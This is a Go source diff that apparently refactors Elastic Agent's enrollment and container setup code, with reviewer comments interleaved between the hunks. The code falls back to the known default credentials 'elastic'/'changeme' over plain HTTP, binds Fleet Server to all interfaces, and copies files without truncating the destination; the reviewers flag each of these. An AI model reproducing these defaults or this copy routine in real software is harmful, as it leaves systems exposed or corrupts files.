@@ -301,32 +387,26 @@ func kibanaFetchToken(client *kibana.Client, policy *kibanaPolicy, streams *cli. return keyDetail.Item.APIKey, nil } -func kibanaClient() (*kibana.Client, error) { - host := envWithDefault(defaultKibanaHost, "KIBANA_FLEET_HOST", "KIBANA_HOST") - username := envWithDefault(defaultUsername, "KIBANA_FLEET_USERNAME", "KIBANA_USERNAME", "ELASTICSEARCH_USERNAME") - password := envWithDefault(defaultPassword, "KIBANA_FLEET_PASSWORD", "KIBANA_PASSWORD", "ELASTICSEARCH_PASSWORD") - +func kibanaClient(cfg kibanaConfig) (*kibana.Client, error) { var tls *tlscommon.Config - ca := envWithDefault("", "KIBANA_FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA") - if ca != "" { + if cfg.Fleet.CA != "" { tls = &tlscommon.Config{ - CAs: []string{ca}, + CAs: []string{cfg.Fleet.CA}, } } return kibana.NewClientWithConfig(&kibana.ClientConfig{ - Host: host, - Username: username, - Password: password, + Host: cfg.Fleet.Host, + Username: cfg.Fleet.Username, + Password: cfg.Fleet.Password, IgnoreVersion: true, TLS: tls, }) } -func findPolicy(policies []kibanaPolicy) (*kibanaPolicy, error) { - fleetServerEnabled := envBool("FLEET_SERVER_ENABLE") - policyName := envWithDefault("", "FLEET_TOKEN_POLICY_NAME") - if fleetServerEnabled { - policyName = envWithDefault("", "FLEET_SERVER_POLICY_NAME", "FLEET_TOKEN_POLICY_NAME") +func findPolicy(cfg setupConfig, policies []kibanaPolicy) (*kibanaPolicy, error) { + policyName := cfg.Fleet.TokenPolicyName + if cfg.FleetServer.Enable { + policyName = cfg.FleetServer.PolicyName } for _, policy := range policies { if policy.Status != "active" { @@ -336,7 +416,7 @@ func findPolicy(policies []kibanaPolicy) (*kibanaPolicy, error) { if policyName == policy.Name { return &policy, nil } - } else if fleetServerEnabled { + } else if cfg.FleetServer.Enable { if policy.IsDefaultFleetServer { return &policy, nil } 
@@ -349,8 +429,7 @@ func findPolicy(policies []kibanaPolicy) (*kibanaPolicy, error) { return nil, fmt.Errorf(`unable to find policy named "%s"`, policyName) } -func findKey(keys []kibanaAPIKey, policy *kibanaPolicy) (*kibanaAPIKey, error) { - tokenName := envWithDefault(defaultTokenName, "FLEET_TOKEN_NAME") +func findKey(keys []kibanaAPIKey, policy *kibanaPolicy, tokenName string) (*kibanaAPIKey, error) { for _, key := range keys { name := strings.TrimSpace(tokenNameStrip.ReplaceAllString(key.Name, "")) if name == tokenName && key.PolicyID == policy.ID { 
@@ -437,6 +516,157 @@ func truncateString(b []byte) string { return strings.Replace(string(runes), "\n", " ", -1) } +// runLegacyAPMServer extracts the bundled apm-server from elastic-agent +// to path and runs it with args. +func runLegacyAPMServer(streams *cli.IOStreams, path string) (*process.Info, error) { + name := "apm-server" + logInfo(streams, "Preparing apm-server for legacy mode.") + cfg := artifact.DefaultConfig() + + logInfo(streams, fmt.Sprintf("Extracting apm-server into install directory %s.", path)) + installer, err := tar.NewInstaller(cfg) + if err != nil { + return nil, errors.New(err, "creating installer") + } + spec := program.Spec{Name: name, Cmd: name, Artifact: name} + version := release.Version() + if release.Snapshot() { + version = fmt.Sprintf("%s-SNAPSHOT", version) + } + // Extract the bundled apm-server into the APM_SERVER_PATH + if err := installer.Install(context.Background(), spec, version, path); err != nil { + return nil, errors.New(err, + fmt.Sprintf("installing %s (%s) from %s to %s", spec.Name, version, cfg.TargetDirectory, path)) + } + // Get the apm-server directory + files, err := ioutil.ReadDir(path) + if err != nil { + return nil, errors.New(err, fmt.Sprintf("reading directory %s", path)) + } + if len(files) != 1 || !files[0].IsDir() { + return nil, errors.New("expected one directory") + } + apmDir := filepath.Join(path, files[0].Name()) + // Extract the ingest pipeline definition to the HOME_DIR + if home := os.Getenv("HOME_PATH"); home != "" { + if err := syncDir(filepath.Join(apmDir, "ingest"), filepath.Join(home, "ingest")); err != nil { + return nil, fmt.Errorf("syncing APM ingest directory to HOME_PATH(%s) failed: %s", home, err) + } + } + // Start apm-server process respecting path ENVs + apmBinary := filepath.Join(apmDir, spec.Cmd) + log, err := logger.New("apm-server", false) + if err != nil { + return nil, err + } + // add APM Server specific configuration + var args []string + addEnv := func(arg, env string) { + 
if v := os.Getenv(env); v != "" { + args = append(args, arg, v) + } + } + addEnv("--path.home", "HOME_PATH") + addEnv("--path.config", "CONFIG_PATH") + addEnv("--path.data", "DATA_PATH") + addEnv("--path.logs", "LOGS_PATH") + addEnv("--httpprof", "HTTPPROF") + logInfo(streams, "Starting legacy apm-server daemon as a subprocess.") + return process.Start(log, apmBinary, nil, os.Geteuid(), os.Getegid(), args...) +} + +func logToStderr(cfg *configuration.Configuration) { + logsPath := envWithDefault("", "LOGS_PATH") + if logsPath == "" { + // when no LOGS_PATH defined the container should log to stderr + cfg.Settings.LoggingConfig.ToStderr = true + cfg.Settings.LoggingConfig.ToFiles = false + } +} + +func setPaths() error { + statePath := envWithDefault(defaultStateDirectory, "STATE_PATH") + if statePath == "" { + return errors.New("STATE_PATH cannot be set to an empty string") + } + topPath := filepath.Join(statePath, "data") + configPath := envWithDefault("", "CONFIG_PATH") + if configPath == "" { + configPath = statePath + } + // ensure that the directory and sub-directory data exists + if err := os.MkdirAll(topPath, 0755); err != nil { + return fmt.Errorf("preparing STATE_PATH(%s) failed: %s", statePath, err) + } + // ensure that the elastic-agent.yml exists in the state directory or if given in the config directory + baseConfig := filepath.Join(configPath, paths.DefaultConfigName) + if _, err := os.Stat(baseConfig); os.IsNotExist(err) { + if err := copyFile(baseConfig, paths.ConfigFile(), 0); err != nil { + return err + } + } + // sync the downloads to the data directory + srcDownloads := filepath.Join(paths.Home(), "downloads") + destDownloads := filepath.Join(statePath, "data", "downloads") + if err := syncDir(srcDownloads, destDownloads); err != nil { + return fmt.Errorf("syncing download directory to STATE_PATH(%s) failed: %s", statePath, err) + } + paths.SetTop(topPath) + paths.SetConfig(configPath) + // when custom top path is provided the home directory is 
not versioned + paths.SetVersionHome(false) + // set LOGS_PATH is given + if logsPath := envWithDefault("", "LOGS_PATH"); logsPath != "" { + paths.SetLogs(logsPath) + // ensure that the logs directory exists + if err := os.MkdirAll(filepath.Join(logsPath), 0755); err != nil { + return fmt.Errorf("preparing LOGS_PATH(%s) failed: %s", logsPath, err) + } + } + return nil +} + +func syncDir(src string, dest string) error { + return filepath.Walk(src, func(path string, info os.FileInfo, err error) error { + if err != nil { + return err + } + relativePath := strings.TrimPrefix(path, src) + if info.IsDir() { + err = os.MkdirAll(filepath.Join(dest, relativePath), info.Mode()) + if err != nil { + return err + } + return nil + } + return copyFile(filepath.Join(dest, relativePath), path, info.Mode()) + }) +} + +func copyFile(destPath string, srcPath string, mode os.FileMode) error { + // if mode is unset; set to the same as the source file + if mode == 0 { + info, err := os.Stat(srcPath) + if err == nil { + // ignoring error because; os.Open will also error if the file cannot be stat'd + mode = info.Mode() + } + } + + src, err := os.Open(srcPath) + if err != nil { + return err + } + defer src.Close() + dest, err := os.OpenFile(destPath, os.O_CREATE|os.O_WRONLY, mode) + if err != nil { + return err + } + defer dest.Close() + _, err = io.Copy(dest, src) + return err +} + type kibanaPolicy struct { ID string `json:"id"` Name string `json:"name"` 
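Review bot: `copyFile` opens the destination with `os.O_CREATE|os.O_WRONLY` and no `os.O_TRUNC`, so when `syncDir` or `setPaths` copies over an existing file that is longer than the source, the old tail stays in place and the result is a corrupt mix of both files. Use `os.OpenFile(destPath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, mode)`. The `mode` argument only takes effect when the file is created, so an existing destination keeps whatever permissions it already had; if the synced files are meant to mirror the source mode, an explicit `os.Chmod` is needed. The deferred `dest.Close()` also drops a write-back error, which for a copy should be returned when `io.Copy` itself succeeded.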
@@ -464,3 +694,97 @@ type kibanaAPIKeys struct { type kibanaAPIKeyDetail struct { Item kibanaAPIKey `json:"item"` } + +// setup configuration + +type setupConfig struct { + Fleet fleetConfig `config:"fleet"` + FleetServer fleetServerConfig `config:"fleet_server"` + Kibana kibanaConfig `config:"kibana"` +} + +type elasticsearchConfig struct { + CA string `config:"ca"` + Host string `config:"host"` + Username string `config:"username"` + Password string `config:"password"` +} + +type fleetConfig struct { + CA string `config:"ca"` + Enroll bool `config:"enroll"` + EnrollmentToken string `config:"enrollment_token"` + Force bool `config:"force"` + Insecure bool `config:"insecure"` + TokenName string `config:"token_name"` + TokenPolicyName string `config:"token_policy_name"` + URL string `config:"url"` +} + +type fleetServerConfig struct { + Cert string `config:"cert"` + CertKey string `config:"cert_key"` + Elasticsearch elasticsearchConfig `config:"elasticsearch"` + Enable bool `config:"enable"` + Host string `config:"host"` + InsecureHTTP bool `config:"insecure_http"` + PolicyID string `config:"policy_id"` + PolicyName string `config:"policy_name"` + Port string `config:"port"` +} + +type kibanaConfig struct { + Fleet kibanaFleetConfig `config:"fleet"` +} + +type kibanaFleetConfig struct { + CA string `config:"ca"` + Host string `config:"host"` + Password string `config:"password"` + Setup bool `config:"setup"` + Username string `config:"username"` +} + +func defaultAccessConfig() setupConfig { + cfg := setupConfig{ + Fleet: fleetConfig{ + CA: envWithDefault("", "FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA"), + Enroll: envBool("FLEET_ENROLL", "FLEET_SERVER_ENABLE"), + EnrollmentToken: envWithDefault("", "FLEET_ENROLLMENT_TOKEN"), + Force: envBool("FLEET_FORCE"), + Insecure: envBool("FLEET_INSECURE"), + TokenName: envWithDefault("Default", "FLEET_TOKEN_NAME"), + TokenPolicyName: envWithDefault("", "FLEET_TOKEN_POLICY_NAME"), + URL: envWithDefault("", "FLEET_URL"), + }, + 
FleetServer: fleetServerConfig{ + Cert: envWithDefault("", "FLEET_SERVER_CERT"), + CertKey: envWithDefault("", "FLEET_SERVER_CERT_KEY"), + Elasticsearch: elasticsearchConfig{ + Host: envWithDefault("http://elasticsearch:9200", "FLEET_SERVER_ELASTICSEARCH_HOST", "ELASTICSEARCH_HOST"), + Username: envWithDefault("elastic", "FLEET_SERVER_ELASTICSEARCH_USERNAME", "ELASTICSEARCH_USERNAME"), + Password: envWithDefault("changeme", "FLEET_SERVER_ELASTICSEARCH_PASSWORD", "ELASTICSEARCH_PASSWORD"), + CA: envWithDefault("", "FLEET_SERVER_ELASTICSEARCH_CA", "ELASTICSEARCH_CA"), + }, + Enable: envBool("FLEET_SERVER_ENABLE"), + Host: envWithDefault("", "FLEET_SERVER_HOST"), + InsecureHTTP: envBool("FLEET_SERVER_INSECURE_HTTP"), + PolicyID: envWithDefault("", "FLEET_SERVER_POLICY_ID"), + PolicyName: envWithDefault("", "FLEET_SERVER_POLICY_NAME", "FLEET_TOKEN_POLICY_NAME"), + Port: envWithDefault("", "FLEET_SERVER_PORT"), + }, + Kibana: kibanaConfig{ + Fleet: kibanaFleetConfig{ + // Remove FLEET_SETUP in 8.x + // The FLEET_SETUP environment variable boolean is a fallback to the old name. The name was updated to + // reflect that its setting up Fleet in Kibana versus setting up Fleet Server. + Setup: envBool("KIBANA_FLEET_SETUP", "FLEET_SETUP"), + Host: envWithDefault("http://kibana:5601", "KIBANA_FLEET_HOST", "KIBANA_HOST"), + Username: envWithDefault("elastic", "KIBANA_FLEET_USERNAME", "KIBANA_USERNAME", "ELASTICSEARCH_USERNAME"), + Password: envWithDefault("changeme", "KIBANA_FLEET_PASSWORD", "KIBANA_PASSWORD", "ELASTICSEARCH_PASSWORD"), + CA: envWithDefault("", "KIBANA_FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA"), + }, + }, + } + return cfg +} diff --git a/x-pack/elastic-agent/pkg/agent/cmd/enroll.go b/x-pack/elastic-agent/pkg/agent/cmd/enroll.go index 30f581331be..ec7cec1211d 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/enroll.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/enroll.go 
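Review bot: `defaultAccessConfig` falls back to the literal credentials `"elastic"` / `"changeme"` and to `http://` hosts for both Elasticsearch and Kibana, so a container started without those variables silently authenticates with a well-known password over cleartext HTTP. Consider defaulting `Username` and `Password` to `""` and returning an error from the caller when Kibana setup or Fleet Server is enabled without them, or at least emitting a warning when the fallback is used. The function also has no doc comment; one that lists the environment variables per field and states the precedence order would help operators (`envWithDefault` is defined outside this hunk, so confirm the order before documenting it). The `Password` fields are plain strings inside `setupConfig`, so the struct should not be printed with `%+v` in diagnostics.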
@@ -12,10 +12,11 @@ import ( "strconv" "syscall" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" + "github.com/spf13/cobra" c "github.com/elastic/beats/v7/libbeat/common/cli" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/warn" @@ -24,13 +25,13 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) -func newEnrollCommandWithArgs(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { +func newEnrollCommandWithArgs(_ []string, streams *cli.IOStreams) *cobra.Command { cmd := &cobra.Command{ Use: "enroll", Short: "Enroll the Agent into Fleet", Long: "This will enroll the Agent into Fleet.", Run: func(c *cobra.Command, args []string) { - if err := enroll(streams, c, flags, args); err != nil { + if err := enroll(streams, c, args); err != nil { fmt.Fprintf(streams.Err, "Error: %v\n", err) os.Exit(1) } @@ -146,13 +147,13 @@ func buildEnrollmentFlags(cmd *cobra.Command, url string, token string) []string return args } -func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { +func enroll(streams *cli.IOStreams, cmd *cobra.Command, args []string) error { fromInstall, _ := cmd.Flags().GetBool("from-install") if !fromInstall { warn.PrintNotGA(streams.Out) } - pathConfigFile := flags.Config() + pathConfigFile := paths.ConfigFile() rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return errors.New(err, 
@@ -182,7 +183,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args } // prompt only when it is not forced and is already enrolled - if !force && (cfg.Fleet != nil && cfg.Fleet.Enabled == true) { + if !force && (cfg.Fleet != nil && cfg.Fleet.Enabled) { confirm, err := c.Confirm("This will replace your current settings. Do you want to continue?", true) if err != nil { return errors.New(err, "problem reading prompt response") @@ -198,7 +199,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args cfg.Settings.LoggingConfig.ToFiles = false cfg.Settings.LoggingConfig.ToStderr = true - logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig) + logger, err := logger.NewFromConfig("", cfg.Settings.LoggingConfig, false) if err != nil { return err } @@ -225,7 +226,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args ctx := handleSignal(context.Background()) - options := application.EnrollCmdOption{ + options := enrollCmdOption{ ID: "", // TODO(ph), This should not be an empty string, will clarify in a new PR. EnrollAPIKey: enrollmentToken, URL: url, @@ -234,7 +235,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args Insecure: insecure, UserProvidedMetadata: make(map[string]interface{}), Staging: staging, - FleetServer: application.EnrollCmdFleetServerOption{ + FleetServer: enrollCmdFleetServerOption{ ConnStr: fServer, ElasticsearchCA: fElasticSearchCA, PolicyID: fPolicy, @@ -247,7 +248,7 @@ func enroll(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args }, } - c, err := application.NewEnrollCmd( + c, err := newEnrollCmd( logger, &options, pathConfigFile, 
diff --git a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go b/x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd.go similarity index 70% rename from x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go rename to x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd.go index ff0b22a1159..2f9f98b5975 100644 --- a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package cmd import ( "bytes" @@ -10,8 +10,6 @@ import ( "fmt" "io" "math/rand" - "net/http" - "net/url" "os" "time" @@ -22,8 +20,11 @@ import ( "github.com/elastic/beats/v7/libbeat/common/backoff" "github.com/elastic/beats/v7/libbeat/common/transport/tlscommon" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/filelock" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/client" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/control/proto" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" 
@@ -31,14 +32,16 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/authority" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + fleetclient "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/kibana" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) const ( maxRetriesstoreAgentInfo = 5 - waitingForAgent = "waiting for Elastic Agent to start" - waitingForFleetServer = "waiting for Elastic Agent to start Fleet Server" + waitingForAgent = "Waiting for Elastic Agent to start" + waitingForFleetServer = "Waiting for Elastic Agent to start Fleet Server" + defaultFleetServerHost = "0.0.0.0" defaultFleetServerPort = 8220 ) @@ -51,36 +54,18 @@ type saver interface { Save(io.Reader) error } -type storeLoad interface { - saver - Load() (io.ReadCloser, error) -} - -type clienter interface { - Send( - ctx context.Context, - method string, - path string, - params url.Values, - headers http.Header, - body io.Reader, - ) (*http.Response, error) - - URI() string -} - -// EnrollCmd is an enroll subcommand that interacts between the Kibana API and the Agent. -type EnrollCmd struct { +// enrollCmd is an enroll subcommand that interacts between the Kibana API and the Agent. +type enrollCmd struct { log *logger.Logger - options *EnrollCmdOption - client clienter + options *enrollCmdOption + client fleetclient.Sender configStore saver kibanaConfig *kibana.Config agentProc *process.Info } -// EnrollCmdFleetServerOption define all the supported enrollment options for bootstrapping with Fleet Server. -type EnrollCmdFleetServerOption struct { +// enrollCmdFleetServerOption define all the supported enrollment options for bootstrapping with Fleet Server. +type enrollCmdFleetServerOption struct { ConnStr string ElasticsearchCA string PolicyID string 
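Review bot: The new constant `defaultFleetServerHost = "0.0.0.0"` makes a bootstrapped Fleet Server listen on every interface whenever no host is supplied, and nothing in the const block says so. Add a comment on it, for example `// defaultFleetServerHost binds all interfaces; pass an explicit host to restrict the listener.` This matters most when the server is started with the insecure-HTTP option, because the enrollment endpoint is then reachable unencrypted on every interface of the host.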
@@ -92,8 +77,8 @@ type EnrollCmdFleetServerOption struct { SpawnAgent bool } -// EnrollCmdOption define all the supported enrollment option. -type EnrollCmdOption struct { +// enrollCmdOption define all the supported enrollment option. +type enrollCmdOption struct { ID string URL string CAs []string @@ -102,10 +87,10 @@ type EnrollCmdOption struct { UserProvidedMetadata map[string]interface{} EnrollAPIKey string Staging string - FleetServer EnrollCmdFleetServerOption + FleetServer enrollCmdFleetServerOption } -func (e *EnrollCmdOption) kibanaConfig() (*kibana.Config, error) { +func (e *enrollCmdOption) kibanaConfig() (*kibana.Config, error) { cfg, err := kibana.NewConfigFromURL(e.URL) if err != nil { return nil, err @@ -130,21 +115,21 @@ func (e *EnrollCmdOption) kibanaConfig() (*kibana.Config, error) { return cfg, nil } -// NewEnrollCmd creates a new enroll command that will registers the current beats to the remote +// newEnrollCmd creates a new enroll command that will registers the current beats to the remote // system. -func NewEnrollCmd( +func newEnrollCmd( log *logger.Logger, - options *EnrollCmdOption, + options *enrollCmdOption, configPath string, -) (*EnrollCmd, error) { +) (*enrollCmd, error) { store := storage.NewReplaceOnSuccessStore( configPath, - DefaultAgentFleetConfig, + application.DefaultAgentFleetConfig, storage.NewDiskStore(paths.AgentConfigFile()), ) - return NewEnrollCmdWithStore( + return newEnrollCmdWithStore( log, options, configPath, @@ -152,14 +137,14 @@ func NewEnrollCmd( ) } -//NewEnrollCmdWithStore creates an new enrollment and accept a custom store. -func NewEnrollCmdWithStore( +// newEnrollCmdWithStore creates an new enrollment and accept a custom store. +func newEnrollCmdWithStore( log *logger.Logger, - options *EnrollCmdOption, + options *enrollCmdOption, configPath string, store saver, -) (*EnrollCmd, error) { - return &EnrollCmd{ +) (*enrollCmd, error) { + return &enrollCmd{ log: log, options: options, configStore: store, 
@@ -167,7 +152,7 @@ func NewEnrollCmdWithStore( } // Execute tries to enroll the agent into Fleet. -func (c *EnrollCmd) Execute(ctx context.Context) error { +func (c *enrollCmd) Execute(ctx context.Context) error { var err error defer c.stopAgent() // ensure its stopped no matter what if c.options.FleetServer.ConnStr != "" { @@ -185,7 +170,7 @@ func (c *EnrollCmd) Execute(ctx context.Context) error { errors.M(errors.MetaKeyURI, c.options.URL)) } - c.client, err = fleetapi.NewWithConfig(c.log, c.kibanaConfig) + c.client, err = fleetclient.NewWithConfig(c.log, c.kibanaConfig) if err != nil { return errors.New( err, "Error", @@ -209,7 +194,7 @@ func (c *EnrollCmd) Execute(ctx context.Context) error { return nil } -func (c *EnrollCmd) fleetServerBootstrap(ctx context.Context) error { +func (c *enrollCmd) fleetServerBootstrap(ctx context.Context) error { c.log.Debug("verifying communication with running Elastic Agent daemon") agentRunning := true _, err := getDaemonStatus(ctx) @@ -229,6 +214,10 @@ func (c *EnrollCmd) fleetServerBootstrap(ctx context.Context) error { c.options.FleetServer.ConnStr, c.options.FleetServer.PolicyID, c.options.FleetServer.Host, c.options.FleetServer.Port, c.options.FleetServer.Cert, c.options.FleetServer.CertKey, c.options.FleetServer.ElasticsearchCA) + if err != nil { + return err + } + configToStore := map[string]interface{}{ "fleet": fleetConfig, } @@ -241,6 +230,7 @@ func (c *EnrollCmd) fleetServerBootstrap(ctx context.Context) error { return err } + var agentSubproc <-chan *os.ProcessState if agentRunning { // reload the already running agent err = c.daemonReload(ctx) 
@@ -249,20 +239,20 @@ func (c *EnrollCmd) fleetServerBootstrap(ctx context.Context) error { } } else { // spawn `run` as a subprocess so enroll can perform the bootstrap process of Fleet Server - err = c.startAgent() + agentSubproc, err = c.startAgent() if err != nil { return err } } - err = waitForFleetServer(ctx, c.log) + err = waitForFleetServer(ctx, agentSubproc, c.log) if err != nil { return errors.New(err, "fleet-server never started by elastic-agent daemon", errors.TypeApplication) } return nil } -func (c *EnrollCmd) prepareFleetTLS() error { +func (c *enrollCmd) prepareFleetTLS() error { host := c.options.FleetServer.Host if host == "" { host = "localhost" @@ -306,10 +296,14 @@ func (c *EnrollCmd) prepareFleetTLS() error { c.options.URL = fmt.Sprintf("https://%s:%d", hostname, port) c.options.CAs = []string{string(ca.Crt())} } + // running with custom Cert and CertKey; URL is required to be set + if c.options.URL == "" { + return errors.New("url is required when a certificate is provided") + } return nil } -func (c *EnrollCmd) daemonReload(ctx context.Context) error { +func (c *enrollCmd) daemonReload(ctx context.Context) error { daemon := client.New() err := daemon.Connect(ctx) if err != nil { @@ -319,7 +313,7 @@ func (c *EnrollCmd) daemonReload(ctx context.Context) error { return daemon.Restart(ctx) } -func (c *EnrollCmd) enrollWithBackoff(ctx context.Context) error { +func (c *enrollCmd) enrollWithBackoff(ctx context.Context) error { delay(ctx, enrollDelay) err := c.enroll(ctx) @@ -347,10 +341,10 @@ func (c *EnrollCmd) enrollWithBackoff(ctx context.Context) error { return err } -func (c *EnrollCmd) enroll(ctx context.Context) error { +func (c *enrollCmd) enroll(ctx context.Context) error { cmd := fleetapi.NewEnrollCmd(c.client) - metadata, err := metadata() + metadata, err := info.Metadata() if err != nil { return errors.New(err, "acquiring metadata failed") } 
@@ -427,21 +421,35 @@ func (c *EnrollCmd) enroll(ctx context.Context) error { return nil } -func (c *EnrollCmd) startAgent() error { +func (c *enrollCmd) startAgent() (<-chan *os.ProcessState, error) { cmd, err := os.Executable() if err != nil { - return err + return nil, err } c.log.Info("Spawning Elastic Agent daemon as a subprocess to complete bootstrap process.") - proc, err := process.Start(c.log, cmd, nil, os.Geteuid(), os.Getegid(), "run") + args := []string{ + "run", "-c", paths.ConfigFile(), + "--path.home", paths.Top(), "--path.config", paths.Config(), + "--path.logs", paths.Logs(), + } + if !paths.IsVersionHome() { + args = append(args, "--path.home.unversioned") + } + proc, err := process.Start( + c.log, cmd, nil, os.Geteuid(), os.Getegid(), args...) if err != nil { - return err + return nil, err } + resChan := make(chan *os.ProcessState) + go func() { + procState, _ := proc.Process.Wait() + resChan <- procState + }() c.agentProc = proc - return nil + return resChan, nil } -func (c *EnrollCmd) stopAgent() { +func (c *enrollCmd) stopAgent() { if c.agentProc != nil { c.agentProc.StopWait() c.agentProc = nil @@ -481,7 +489,7 @@ type waitResult struct { err error } -func waitForFleetServer(ctx context.Context, log *logger.Logger) error { +func waitForFleetServer(ctx context.Context, agentSubproc <-chan *os.ProcessState, log *logger.Logger) error { ctx, cancel := context.WithTimeout(ctx, 2*time.Minute) defer cancel() @@ -490,6 +498,7 @@ func waitForFleetServer(ctx context.Context, log *logger.Logger) error { defer innerCancel() go func() { msg := "" + msgCount := 0 for { <-time.After(1 * time.Second) status, err := getDaemonStatus(innerCtx) 
@@ -498,29 +507,50 @@ func waitForFleetServer(ctx context.Context, log *logger.Logger) error { return } if err != nil { - log.Debug(waitingForAgent) + log.Debugf("%s: %s", waitingForAgent, err) if msg != waitingForAgent { msg = waitingForAgent + msgCount = 0 log.Info(waitingForAgent) + } else { + msgCount++ + if msgCount > 5 { + msgCount = 0 + log.Infof("%s: %s", waitingForAgent, err) + } } continue } app := getAppFromStatus(status, "fleet-server") if app == nil { - log.Debug(waitingForFleetServer) + err = errors.New("no fleet-server application running") + log.Debugf("%s: %s", waitingForFleetServer, err) if msg != waitingForFleetServer { msg = waitingForFleetServer + msgCount = 0 log.Info(waitingForFleetServer) + } else { + msgCount++ + if msgCount > 5 { + msgCount = 0 + log.Infof("%s: %s", waitingForFleetServer, err) + } } continue } - log.Debugf("fleet-server status: %s - %s", app.Status, app.Message) + log.Debugf("%s: %s - %s", waitingForFleetServer, app.Status, app.Message) if app.Status == proto.Status_DEGRADED || app.Status == proto.Status_HEALTHY { // app has started and is running + if app.Message != "" { + log.Infof("Fleet Server - %s", app.Message) + } resChan <- waitResult{} break } else if app.Status == proto.Status_FAILED { // app completely failed; exit now + if app.Message != "" { + log.Infof("Fleet Server - %s", app.Message) + } resChan <- waitResult{err: errors.New(app.Message)} break } 
@@ -528,18 +558,36 @@ func waitForFleetServer(ctx context.Context, log *logger.Logger) error { appMsg := fmt.Sprintf("Fleet Server - %s", app.Message) if msg != appMsg { msg = appMsg + msgCount = 0 log.Info(appMsg) + } else { + msgCount++ + if msgCount > 5 { + msgCount = 0 + log.Info(appMsg) + } } } } }() var res waitResult - select { - case <-ctx.Done(): - innerCancel() - res = <-resChan - case res = <-resChan: + if agentSubproc == nil { + select { + case <-ctx.Done(): + innerCancel() + res = <-resChan + case res = <-resChan: + } + } else { + select { + case ps := <-agentSubproc: + res = waitResult{err: fmt.Errorf("spawned Elastic Agent exited unexpectedly: %s", ps)} + case <-ctx.Done(): + innerCancel() + res = <-resChan + case res = <-resChan: + } } if res.err != nil { 
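Review bot: The two `select` statements at the end of `waitForFleetServer` differ only in the `agentSubproc` case, and a receive from a nil channel never becomes ready, so the `if agentSubproc == nil` branch is redundant. A single `select` with `case ps := <-agentSubproc:`, `case <-ctx.Done():` and `case res = <-resChan:` behaves the same for both callers and removes the duplicated cancel path. In the subprocess-exit case the polling goroutine is stopped only by the deferred `innerCancel()`; whether its final send on `resChan` can block depends on how `resChan` is created, which is outside this hunk. The function starts in an earlier hunk.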
@@ -587,3 +635,59 @@ func storeAgentInfo(s saver, reader io.Reader) error { return nil } + +func createFleetServerBootstrapConfig(connStr string, policyID string, host string, port uint16, cert string, key string, esCA string) (*configuration.FleetAgentConfig, error) { + es, err := configuration.ElasticsearchFromConnStr(connStr) + if err != nil { + return nil, err + } + if esCA != "" { + es.TLS = &tlscommon.Config{ + CAs: []string{esCA}, + } + } + if host == "" { + host = defaultFleetServerHost + } + if port == 0 { + port = defaultFleetServerPort + } + cfg := configuration.DefaultFleetAgentConfig() + cfg.Enabled = true + cfg.Server = &configuration.FleetServerConfig{ + Bootstrap: true, + Output: configuration.FleetServerOutputConfig{ + Elasticsearch: es, + }, + Host: host, + Port: port, + } + if policyID != "" { + cfg.Server.Policy = &configuration.FleetServerPolicyConfig{ID: policyID} + } + if cert != "" || key != "" { + cfg.Server.TLS = &tlscommon.Config{ + Certificate: tlscommon.CertificateConfig{ + Certificate: cert, + Key: key, + }, + } + } + + if err := cfg.Valid(); err != nil { + return nil, errors.New(err, "invalid enrollment options", errors.TypeConfig) + } + return cfg, nil +} + +func createFleetConfigFromEnroll(accessAPIKey string, kbn *kibana.Config) (*configuration.FleetAgentConfig, error) { + cfg := configuration.DefaultFleetAgentConfig() + cfg.Enabled = true + cfg.AccessAPIKey = accessAPIKey + cfg.Kibana = kbn + + if err := cfg.Valid(); err != nil { + return nil, errors.New(err, "invalid enrollment options", errors.TypeConfig) + } + return cfg, nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/enroll_cmd_test.go b/x-pack/elastic-agent/pkg/agent/cmd/enroll_cmd_test.go similarity index 